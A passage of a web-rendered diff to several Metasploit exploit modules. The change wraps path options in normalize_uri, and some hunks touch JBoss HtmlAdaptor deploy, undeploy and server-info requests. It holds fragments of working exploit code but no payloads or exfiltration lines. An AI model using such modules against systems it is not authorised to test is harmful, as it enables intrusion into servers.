'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'method' => datastore['VERB'],
|
||||
'data' => data
|
||||
}, 5)
|
||||
else
|
||||
res = send_request_cgi(
|
||||
{
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor;index.jsp?' + data,
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor;index.jsp?' + data,
|
||||
'method' => datastore['VERB'],
|
||||
}, 30)
|
||||
end
|
||||
|
|
@ -378,7 +378,7 @@ EOT
|
|||
|
||||
|
||||
def query_serverinfo
|
||||
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path,
|
||||
|
|
|
|||
|
|
@ -232,7 +232,7 @@ EOT
|
|||
replace_params.each { |key, value| data.gsub!(key, value) }
|
||||
|
||||
res = send_request_cgi({
|
||||
'uri' => target_uri.path,
|
||||
'uri' => normalize_uri(target_uri.path),
|
||||
'method' => 'POST',
|
||||
'data' => data,
|
||||
'headers' =>
|
||||
|
|
|
|||
|
|
@ -176,7 +176,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if (datastore['VERB'] == "POST")
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'vars_post' =>
|
||||
{
|
||||
'action' => 'invokeOpByName',
|
||||
|
|
@ -189,7 +189,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
else
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'vars_get' =>
|
||||
{
|
||||
'action' => 'invokeOpByName',
|
||||
|
|
@ -275,7 +275,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
print_status("Undeploying #{app_base} ...")
|
||||
res = send_request_cgi({
|
||||
'method' => datastore['VERB'],
|
||||
'uri' => datastore['PATH'] + '/HtmlAdaptor',
|
||||
'uri' => normalize_uri(datastore['PATH']) + '/HtmlAdaptor',
|
||||
'vars_post' =>
|
||||
{
|
||||
'action' => 'invokeOpByName',
|
||||
|
|
@ -314,7 +314,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def query_serverinfo
|
||||
path = datastore['PATH'] + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
path = normalize_uri(datastore['PATH']) + '/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo'
|
||||
res = send_request_raw(
|
||||
{
|
||||
'uri' => path
|
||||
|
|
|
|||
|
|
@ -60,12 +60,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
end
|
||||
|
||||
def target_url
|
||||
uri = datastore['URI']
|
||||
|
||||
# Make sure uri begins with '/'
|
||||
if uri[0] != '/'
|
||||
uri = '/' + uri
|
||||
end
|
||||
uri = normalize_uri(datastore['URI'])
|
||||
|
||||
# Extract two things:
|
||||
# 1. The file path (/index.php), including the base
|
||||
|
|
@ -81,7 +76,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
if base.empty? or fname.empty? or params.empty?
|
||||
res = send_request_cgi({
|
||||
'method' => 'GET',
|
||||
'uri' => datastore['URI']
|
||||
'uri' => normalize_uri(datastore['URI'])
|
||||
}, 20)
|
||||
|
||||
if res and res.code == 200
|
||||
|
|
|
|||
|
|
@ -61,7 +61,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def check
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
res = send_request_raw({
|
||||
|
|
@ -78,7 +78,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
|
||||
|
||||
def exploit
|
||||
uri = target_uri.path
|
||||
uri = normalize_uri(target_uri.path)
|
||||
uri << '/' if uri[-1, 1] != '/'
|
||||
|
||||
peer = "#{rhost}:#{rport}"
|
||||
|
|
|
|||
Some files were not shown because too many files have changed in this diff Show More
Loading…
Reference in New Issue